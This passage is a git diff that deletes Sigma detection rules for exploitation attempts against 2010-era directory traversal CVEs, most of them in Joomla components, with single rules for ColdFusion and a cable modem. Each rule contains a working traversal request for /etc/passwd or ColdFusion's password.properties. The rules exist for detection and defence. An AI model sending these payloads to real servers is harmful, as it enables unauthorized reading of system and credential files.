https://www.cvedetails.com/cve/CVE-2010-0943 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml deleted file mode 100644 index f96cb67b..00000000 --- a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-0944 exploitation attempt -id: c656c178-4f5a-4dc4-a605-21e225987ac5 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JCollection (com_jcollection) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11088 -- https://www.cvedetails.com/cve/CVE-2010-0944 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml deleted file mode 100644 index 8cead1aa..00000000 --- a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1306 exploitation attempt -id: b2105629-bb00-47a1-a01e-24147433710c -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component - 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml deleted file mode 100644 index 6e4902b2..00000000 --- a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1314 exploitation attempt -id: 532cef3e-f3cc-437d-b6da-146675cb61ac -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) - component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml deleted file mode 100644 index 1286b44e..00000000 --- a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1345 exploitation attempt -id: 8869cdca-39da-496a-ba9c-c9eeb5c51a4c -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) - component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml deleted file mode 100644 index 206da49b..00000000 --- a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1353 exploitation attempt -id: e464164c-0cb6-427f-9eea-06dbf29d3044 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the view parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12068 -- https://www.cvedetails.com/cve/CVE-2010-1353 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml deleted file mode 100644 index 29e32c32..00000000 --- a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1474 exploitation attempt -id: 4964f728-0184-4efb-b8b1-23087da5baab -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) - component 1.5.x for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12182 -- https://www.cvedetails.com/cve/CVE-2010-1474 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml deleted file mode 100644 index 50fbb166..00000000 --- a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1475 exploitation attempt -id: 5f4ba4e9-6b51-4284-afdf-15485b08088f -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) - component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml deleted file mode 100644 index 3f165d2a..00000000 --- a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1495 exploitation attempt -id: 24ffa234-2963-4518-b72d-7aae991d1189 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Matamko (com_matamko) component - 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12286 -- https://www.cvedetails.com/cve/CVE-2010-1495 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml deleted file mode 100644 index 295628c1..00000000 --- a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1532 exploitation attempt -id: d65086e6-88a4-45e5-bc99-b1695aff4bd7 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) - component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml deleted file mode 100644 index 17821b03..00000000 --- a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1533 exploitation attempt -id: ad63c834-1072-4c2d-b246-f615557b3026 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TweetLA (com_tweetla) component - 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml deleted file mode 100644 index 38236528..00000000 --- a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1535 exploitation attempt -id: b0962f54-4cfd-4059-b742-af6f4e82e8b2 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) - component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml deleted file mode 100644 index 2c2df33e..00000000 --- a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1602 exploitation attempt -id: fdf12606-2a8a-4450-b3b7-e6bdf03e7096 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) - component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12283 -- https://www.cvedetails.com/cve/CVE-2010-1602 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml deleted file mode 100644 index 74080bca..00000000 --- a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1657 exploitation attempt -id: 41364f89-94ca-464d-8ab4-0c1348656707 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the SmartSite (com_smartsite) component - 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12428 -- https://www.cvedetails.com/cve/CVE-2010-1657 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml deleted file mode 100644 index 87d7b66a..00000000 --- a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1718 exploitation attempt -id: 14f01fca-dec5-4144-a40c-63488767b57f -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in archeryscores.php in the Archery - Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to - include and execute arbitrary local files via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml deleted file mode 100644 index eff64809..00000000 --- a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1722 exploitation attempt -id: d1b8ce75-b746-48a9-ad5c-4d692f5a21a0 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Online Market (com_market) component - 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12177 -- https://www.cvedetails.com/cve/CVE-2010-1722 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml deleted file mode 100644 index 356a6f8a..00000000 --- a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1875 exploitation attempt -id: 9fec2f12-8d56-4b94-8140-be92319e6282 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Real Estate Property (com_properties) - component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files - and possibly have unspecified other impact via a .. (dot dot) in the controller - parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11851 -- https://www.cvedetails.com/cve/CVE-2010-1875 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml deleted file mode 100644 index cdcf71d5..00000000 --- a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1953 exploitation attempt -id: b83f9267-f61a-4a52-a39c-2244330665c8 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) - component 1.0 for Joomla! allows remote attackers to read arbitrary files via a - .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12288 -- https://www.cvedetails.com/cve/CVE-2010-1953 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml deleted file mode 100644 index 4430f4fb..00000000 --- a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1954 exploitation attempt -id: e15b002d-bfad-4ae6-8253-5c5e1d3d7c61 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) - component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml deleted file mode 100644 index 6204191c..00000000 --- a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1955 exploitation attempt -id: e5ac823c-60fa-40c5-b7b2-965e023d3747 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) - component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12238 -- https://www.cvedetails.com/cve/CVE-2010-1955 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml deleted file mode 100644 index ee9852f8..00000000 --- a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1979 exploitation attempt -id: 62b49fe0-8735-4c00-ac45-52ac7b673174 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) - component build 880 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12088 -- https://www.cvedetails.com/cve/CVE-2010-1979 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml deleted file mode 100644 index 2d32c405..00000000 --- a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1983 exploitation attempt -id: 7325d138-af8e-42a1-80eb-a6b69c32da79 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) - component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary - files via a .. (dot dot) in the view parameter to index.php -references: -- https://www.exploit-db.com/exploits/12055 -- https://www.cvedetails.com/cve/CVE-2010-1983 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml deleted file mode 100644 index 171ec24e..00000000 --- a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2033 exploitation attempt -id: 2d38d9d5-b9a3-46dd-8f55-81c5961c21b2 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html -- https://www.cvedetails.com/cve/CVE-2010-2033 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml deleted file mode 100644 index 06d0b88e..00000000 --- a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2036 exploitation attempt -id: ae8ea246-0ec4-48ed-96b1-e6ad8a8a0274 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- https://www.exploit-db.com/exploits/34004 -- https://www.cvedetails.com/cve/CVE-2010-2036 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml deleted file mode 100644 index 3609a834..00000000 --- a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-2259 exploitation attempt -id: a64bc24c-39fc-4531-b0c3-9d26f439f246 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component - for Joomla! allows remote attackers to include and execute arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/10946 -- https://www.cvedetails.com/cve/CVE-2010-2259 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml deleted file mode 100644 index 600ebee3..00000000 --- a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2307 exploitation attempt -id: 4d1124ea-beb9-4b9a-b75b-a76f61236a67 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the web server for Motorola - SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow - remote attackers to read arbitrary files via (1) "//" (multiple leading slash), - (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. -references: -- https://www.securityfocus.com/bid/40550/info -- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml deleted file mode 100644 index 94fcbdbc..00000000 --- a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2682 exploitation attempt -id: c190dd5f-7b3c-4184-bca0-94129a1a0cdb -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) - component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/14017 -- https://www.cvedetails.com/cve/CVE-2010-2682 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml deleted file mode 100644 index 6513ed68..00000000 --- a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml +++ /dev/null @@ -1,27 +0,0 @@ -title: CVE-2010-2861 exploitation attempt -id: d98ff4e9-b11e-40b7-a536-b71bd1800042 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the administrator console - in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files - via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, - (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm - in CFIDE/administrator/. -references: -- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -- http://www.adobe.com/support/security/bulletins/apsb10-18.html -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml deleted file mode 100644 index 8d50a3c8..00000000 --- a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-3426 exploitation attempt -id: 3178d248-aa37-4f7c-97ee-3c16809bca69 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) - component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute - arbitrary local files via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml deleted file mode 100644 index e8a4bb98..00000000 --- a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4231 exploitation attempt -id: 52c315b8-c56e-41b9-ace4-fdfdc593657d -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. - The server is vulnerable to directory transversal attacks, allowing access to any - file 